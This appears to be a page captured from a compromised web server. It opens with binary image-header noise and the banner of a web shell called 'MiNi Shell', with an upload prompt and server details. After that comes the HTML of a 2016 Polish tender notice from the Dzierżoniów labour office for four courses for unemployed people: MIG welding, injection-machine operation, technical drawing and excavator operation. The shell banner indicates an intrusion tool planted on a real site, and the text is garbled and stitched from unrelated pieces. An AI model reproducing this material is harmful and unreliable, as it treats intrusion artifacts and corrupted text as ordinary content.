JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160530/137108-N-2016.html

<p class="kh_header"><b>Dzierżoniów: Realizacja 4 szkoleń grupowych dla osób bezrobotnych oraz dla osób poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Dzierżoniowie finansowanych z Funduszu Pracy</b><br>
<b>Numer ogłoszenia: 137108 - 2016; data zamieszczenia: 30.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , Rynek 27, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 8320380, 8325254, faks 074 8312347.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.pow.dzierzoniow.pl/pl/bip/jednostki_organizacyjne/urzad_pracy/pupwd oraz www.pupdzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja 4 szkoleń grupowych dla osób bezrobotnych oraz dla osób poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Dzierżoniowie finansowanych z Funduszu Pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja 4 szkoleń grupowych dla osób bezrobotnych oraz dla osób poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Dzierżoniowie finansowanych z Funduszu Pracy: 1. Spawanie blach i rur spoinami pachwinowymi metodą MIG aluminium i jego stopów z dwutygodniową praktyką u pracodawcy. 2. Operator maszyn wtryskowych  z praktyką u pracodawcy. 3. Kurs czytania rysunku technicznego od podstaw wraz z nauką obsługi 
urządzeń pomiarowych. 4. Operator koparek jednonaczyniowych do 0,8 m3 klasy III.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca:
- posiada (aktualny na 2016 rok) wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy dla jego siedziby, a ponadto:
- w przypadku zadania częściowego nr 1 posiada atest do szkolenia i egzaminowania spawaczy lub jednorazową zgodę na prowadzenie kursu  spawania zgodnie z przedmiotem zamówienia, wydane przez jednostkę uprawnioną do rejestracji i nadzorowania kursów oraz egzaminów spawalniczych.
- w przypadku zadania częściowego nr 4 posiada potwierdzenie spełniania wymagań określonych w § 25 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r.w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych  i drogowych (Dz. U. z 2001, Nr 118, poz. 1263) wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań dotyczących spełnienia tego warunku.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku zadania częściowego nr 1 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia: 
- w zakresie realizacji zajęć praktycznych - stanowiskami spawalniczymi przystosowanymi do spawania metodą MIG aluminium i jego stopów co najmniej  w takiej ilości, aby jedno stanowisko spawalnicze przypadało maksymalnie na dwóch uczestników szkolenia;
- w zakresie dotyczącym organizacji praktyki u pracodawcy - miejscem w którym będzie zorganizowana praktyka w wymiarze 80 godzin.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w  przedłożonym wykazie i oświadczeniach.
W przypadku zadania częściowego nr 2 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia:
-w zakresie realizacji zajęć praktycznych - zestawem narzędzi i materiałów niezbędnych do prawidłowego przeprowadzenia szkolenia.
- w zakresie dotyczącym organizacji praktyki u pracodawcy - miejscem, w którym będzie zorganizowana praktyka w wymiarze 80 godzin.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w przedłożonym wykazie i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku zadania częściowego nr 1 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia: 
- w zakresie realizacji zajęć teoretycznych i praktycznych - co najmniej dwiema osobami, przy czym  co najmniej jedną osobą posiadającą aktualne (ważne co najmniej do dnia zakończenia szkolenia) uprawnienia spawalnicze w zakresie odpowiadającym zakresowi szkolenia oraz co najmniej jedną osobą posiadającą uprawnienia egzaminatora w zakresie objętym szkoleniem. Zamawiający nie dopuszcza możliwości realizacji zamówienia przez osoby nie posiadające ww. uprawnień, co najmniej w zakresie, w jakim będą brały udział w realizacji zamówienia;
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w  przedłożonym wykazie i oświadczeniach.
W przypadku zadania częściowego nr 2 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia:
- w zakresie realizacji zajęć teoretycznych i praktycznych - co najmniej jedną osobą posiadającą doświadczenie w prowadzeniu zajęć  z zakresu wykonywanych czynności w trakcie realizacji zamówienia w liczbie minimum  60 godzin. Zamawiający nie dopuszcza możliwości realizacji zamówienia przez osoby nie posiadające ww. uprawnień, co najmniej w zakresie, w jakim będą brały udział w realizacji zamówienia;
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w przedłożonym wykazie i oświadczeniach.
W przypadku zadania częściowego nr 3 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia:
- w zakresie realizacji zajęć teoretycznych i praktycznych - co najmniej jedną osobą posiadającą doświadczenie w prowadzeniu zajęć z zakresu wykonywanych czynności w trakcie realizacji zamówienia w liczbie minimum 50 godzin. Nie dopuszcza się, aby zajęcia szkoleniowe prowadzone były przez osobę(y) nie spełniającą(ce) ww. wymagań.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w przedłożonym wykazie i oświadczeniach.
W przypadku zadania częściowego nr 4 warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje lub będzie dysponował do realizacji niniejszego zamówienia:
- w zakresie realizacji zajęć teoretycznych i praktycznych -  co najmniej jedną osobą posiadającą doświadczenie w prowadzeniu zajęć z zakresu wykonywanych czynności w trakcie realizacji zamówienia w liczbie min. 100 godzin. Nie dopuszcza się, aby zajęcia szkoleniowe prowadzone były przez osobę(y) nie spełniającą(ce) ww. wymagań.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w przedłożonym wykazie i oświadczeniach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań dotyczących spełnienia tego warunku.
Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - 
nie spełnia w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Kwalifikacje kadry dydaktycznej uczestniczącej w wykonaniu zamówienia - 40</li>
<li>3 - Certyfikat jakości usług w zakresie usług szkoleniowych - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień umowy wyłącznie w formie pisemnej (aneks) za zgodą obu stron z zastrzeżeniem art. 144 ustawy Pzp. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy tj. możliwość zmiany nazwy, siedziby stron umowy, oraz innych danych identyfikacyjnych, pod rygorem nieważności takiej zmiany oraz w niżej wymieniowych przypadkach:
a) zmiany terminu realizacji zamówienia w przypadku zaistnienia co najmniej jednej z następujących okoliczności:
- z powodu działania siły wyższej mającej bezpośredni wpływ na terminowość realizacji zamówienia, np. zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody    w znacznych rozmiarach;
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
b) zmiany miejsca realizacji zamówienia, pod warunkiem spełnienia wymagań określonych w rozdziale III pkt 2 lit. e,f,g,h, niniejszej specyfikacji w przypadku zaistnienia co najmniej jednej z następujących okoliczności:
- z powodu działania siły wyższej mającej bezpośredni wpływ na miejsce realizacji zamówienia, np. zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron;
c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pow.dzierzoniow.pl/pl/bip/jednostki_organizacyjne/urzad_pracy/pupwd oraz www.pupdzierzoniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Dzierżoniowie Rynek 27, 58-200 Dzierżoniów (sekretariat pokój 102).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2016 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Dzierżoniowie Rynek 27, 58-200 Dzierżoniów (sekretariat pokój 102).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Spawanie blach i rur spoinami pachwinowymi metodą MIG aluminium i jego stopów z dwutygodniową praktyką u pracodawcy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Szkolenie dla 1 grupy liczącej nie mniej, niż 8 osób i nie więcej, niż 10 osób.   Zamawiający przekaże Wykonawcy listę osób skierowanych na szkolenie najpóźniej 1 dzień przed rozpoczęciem szkolenia.                         
b) Wymagana ilość godzin szkolenia: 
 241 godzin szkolenia na 1 uczestnika (łącznie  z egzaminem kwalifikacyjnym spawacza),                                          
w tym: 
33 godzin teorii MIG - aluminium i jego stopów,
120 godzin praktyki MIG - aluminium i jego stopów,
8 godzin egzaminu kwalifikacyjnego spawacza metodą MIG - aluminium i jego stopów,
80 godzin praktyki u pracodawcy.
c) Zakres szkolenia:
Zasady BHP i p.poż., teoria MIG  - aluminium i jego stopów, praktyka MIG  - aluminium i jego stopów, praktyka u pracodawcy.
d) Charakterystyka osób dla których szkolenie jest przeznaczone|: 
Szkolenie przeznaczone jest dla osób bezrobotnych  i poszukujących pracy, uprawnionych do korzystania ze szkoleń, które posiadają wykształcenie min. podstawowe;   zamierzają zdobyć lub uzupełnić wiadomości  i umiejętności zawodowe lub chcą dokonać zmiany zawodu.    
e) Rodzaj dokumentu potwierdzającego ukończenie szkolenia:
Zaświadczenie  o ukończeniu szkolenia i uzyskaniu umiejętności Spawanie blach i rur spoinami pachwinowymi metodą MIG aluminium i jego stopów z dwutygodniową praktyką u pracodawcy oraz w przypadku osób, które uzyskają pozytywny wynik egzaminu kwalifikacyjnego spawacza, książka spawacza oraz świadectwo egzaminu kwalifikacyjnego spawacza metodą 131 (aluminium i jego stopów) na okres ważności 3 lata. Termin realizacji: wrzesień 2016r. - październik 2016r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej uczestniczącej w wykonaniu zamówienia - 40</li>
<li>3. Certyfikat jakości usług w zakresie usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Operator maszyn wtryskowych  z praktyką u pracodawcy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Szkolenie dla 1 grupy liczącej 10 osób. Zamawiający przekaże Wykonawcy listę osób skierowanych na szkolenie najpóźniej 1 dzień przed rozpoczęciem szkolenia.                         
b) Wymagana ilość godzin szkolenia: 
110 godzin szkolenia na 1 uczestnika (łącznie z egzaminem wewnętrznym), 
w tym:
20 godzin teorii;
9 godzin zajęć praktycznych; 
80 godzin praktyki  u pracodawcy; 
1 godzina egzaminu wewnętrznego.   
c) Zakres szkolenia:
Zajęcia teoretyczne:  zasady i przepisy BHP i ochrony p. poż.; warunki wtrysku wybranych tworzyw przetwarzanych w zakładzie; budowa, zasady działania, wykorzystywanie wtryskarek oraz ich obsługa techniczna; ustawianie, kontrola i optymalizacja procesów wtryskiwania; wady wyrobów wtryskiwanych (wpływ konstrukcji formy na wady wyrobów, procedury usuwania wad wyrobów, doraźne naprawy form wtryskowych), segregowanie i składowanie wyrobów zgodnie              z instrukcjami wewnątrzzakładowymi, wypełnianie dokumentacji produkcyjnej i jakościowej. 
zajęcia praktyczne: nauka czytania rysunku technicznego (podstawy) oraz nauka obsługi urządzeń pomiarowych. 
praktyka u pracodawcy. 
d) Charakterystyka osób dla których szkolenie jest przeznaczone|: 
Szkolenie przeznaczone jest dla osób bezrobotnych  i poszukujących pracy, uprawnionych do korzystania ze szkoleń, które posiadają wykształcenie min. podstawowe; zamierzają zdobyć lub uzupełnić wiadomości  i umiejętności zawodowe lub chcą dokonać zmiany zawodu.    
e) Rodzaj dokumentu potwierdzającego ukończenie szkolenia:
Zaświadczenie o ukończeniu szkolenia i uzyskaniu umiejętności Operator maszyn wtryskowych z praktyką u pracodawcy. Termin realizacji: październik 2016r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej uczestniczącej w wykonaniu zamówienia - 40</li>
<li>3. Certyfikat jakości usług w zakresie usług szkoleniowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs czytania rysunku technicznego od podstaw wraz z nauką obsługi urządzeń pomiarowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a) Szkolenie dla 3 grup liczących po 10 osób. Zamawiający przekaże Wykonawcy listę osób skierowanych na szkolenie najpóźniej 1 dzień przed rozpoczęciem szkolenia.           
b) Wymagana ilość godzin szkolenia: 
60 godzin szkolenia na 1 uczestnika (łącznie z egzaminem wewnętrznym), w tym: 
25 godzin teorii;
34 godziny praktyki ( w tym: 25 godzin ćwiczeń w rysowaniu i czytaniu rysunku technicznego oraz 9 godzin nauki obsługi urządzeń pomiarowych);
1 godzina egzaminu wewnętrznego.   
c) Zakres szkolenia:
zasady i przepisy BHP i ochrony p. poż.; podstawy i rodzaje rysunku technicznego; normy obowiązujące w rysunku technicznym; rodzaje i zastosowanie linii rysunkowych; formy rysunkowe; konstrukcje geometryczne; podstawowe zasady wymiarowania; rzutowanie; przekroje; uproszczone stosowanie rysunku technicznego; ogólne zasady zarządzania dokumentacja rysunkową ( numeracja, ewidencja rysunku, składanie większych form); nauka obsługi urządzeń pomiarowych.
d) Charakterystyka osób dla których przeznaczone jest szkolenie:
Szkolenie przeznaczone jest dla osób bezrobotnych   i poszukujących pracy, uprawnionych do korzystania ze szkoleń, które posiadają wykształcenie min. podstawowe;   zamierzają zdobyć lub uzupełnić wiadomości  i umiejętności zawodowe lub chcą dokonać zmiany zawodu.
e)Rodzaj dokumentu potwierdzającego ukończenie szkolenia:
Zaświadczenie o ukończeniu szkolenia i uzyskaniu umiejętności Kurs czytania rysunku technicznego od podstaw wraz z nauką urządzeń pomiarowych. Termin realizacji: grupa I: lipiec-sierpień 2016r., grupa II: wrzesień 2016r., grupa III: październik 2016r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Kwalifikacje kadry dydaktycznej uczestniczącej w wykonaniu zamówienia - 40</li>
<li>3. Certyfikat jakości usług w zakresie usług szkoleniowych - 10</li>
</ul>
